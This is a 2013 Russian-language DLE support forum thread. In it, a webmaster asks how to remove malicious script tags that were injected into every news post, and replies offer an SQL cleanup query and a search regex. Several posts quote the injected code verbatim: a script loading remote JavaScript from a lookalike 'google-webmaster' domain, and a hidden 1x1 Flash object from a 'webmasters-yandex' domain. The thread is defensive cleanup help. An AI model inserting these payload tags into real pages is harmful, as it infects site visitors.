Не нравятся результаты поиска? Попробуйте другой поиск!
DLE FAQ » Все вопросы » Общие вопросы » Как удалить фишинговыю ссылку

Как удалить фишинговыю ссылку


     13.09.2013    Фишинговая ссылка, фишинг    Все вопросы » Общие вопросы    5137

вопрос
Всем привет! Сайт d3ver.kz
Прошу помощи или совета! Сталкиваюсь с таким впервые, я самоучка, но достиг многого!

Сайт подвергся заражению фишинговыми ссылками, при открытии ругается KIS, при просмотре исходного кода обнаружил, что вредоносный код цепляется только к коротким и полным новостям, после каждой новости добавляется код
<script async="async" type="text/javascript" src="http://google-webmaster.ru/1c383cd30b7c298ab50293adfecb7b18.js"></script>

Первое что я сделал это начал поиск этой ссылки в папке с движком, с помощью проги notepad++, поиск не удался.
Залез в базу SQL, там в строке с новостями в каждой теме была добавлена это ссылка, я отредактировал новости, НО ссылки появились на след. день снова.

Кто сталкивался с такими ссылками??? Посоветуйте, где копать, что искать, как найти или выкурить её можно из сайта!


Ответил: Бахмут


Сам столкнулся недавно с этой гадостью. Вот запрос, который нужно сделать по базе данных:

UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script async="async" type="text/javascript" src="http://google-webmaster.ru/1c383cd30b7c298ab50293adfecb7b18.js"></script>', ''),
`full_story`=REPLACE(full_story, '<script async="async" type="text/javascript" src="http://google-webmaster.ru/1c383cd30b7c298ab50293adfecb7b18.js"></script>', '')
WHERE
`short_story` LIKE '%<script async="async" type="text/javascript" src="http://google-webmaster.ru/1c383cd30b7c298ab50293adfecb7b18.js"></script>%'
OR
`full_story` LIKE '%<script async="async" type="text/javascript" src="http://google-webmaster.ru/1c383cd30b7c298ab50293adfecb7b18.js"></script>%'


Это удалит скрипт со всех новостей как краткой, так и полной новости. Но это поможет в том случае, если скрипт везде один и тот же. Если там будет хоть цифра или буква в нем разные - тогда лучше откатить бд, иначе таких запросов кучу нужно сделать на каждый скрипт.
У меня именно этот удалился, но вместе с ним по базе был рассеян еще один, начинающийся с
<object
... Вот этот был в разных вариациях, так что пришлось делать откат бд.
Кстати, обновление движка не помогло, вирус залился на следующий день по новой. Пришлось вообще снести все файлы движка, установить с нуля и поставил AntiShell. Пока 5 дней - полет нормальный.

3 комментария

Wizard2030
Юзер

Wizard2030 - 14 сентября 2013 21:16 -

Спасибо, я залез в базу и удалил из каждой новости эту ссылку.

salam
Юзер

salam - 16 сентября 2013 08:59 -

Может кому пригодится.
Регулярное выражение для быстрого поиска и замены кода вида
<script async=всякие разные символы"></script>

<script async=[^>]*>*.</script>

Работает в notepad++

sader90
Юзер

sader90 - 22 сентября 2013 20:33 -

salam,
тоже подцепил эту гадость

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?584929899"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="http://webmasters-yandex.ru/flash.swf?289360342" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object>


<script async="async" type="text/javascript" src="http://google-webmaster.ru/eda80a3d5b344bc40f3bc04f65b7a357.js"></script>


спасибо! помогло ваше регулярное выражение

Чтобы комментировать - войдите или зарегистрируйтесь на сайте

Похожие вопросы

наверх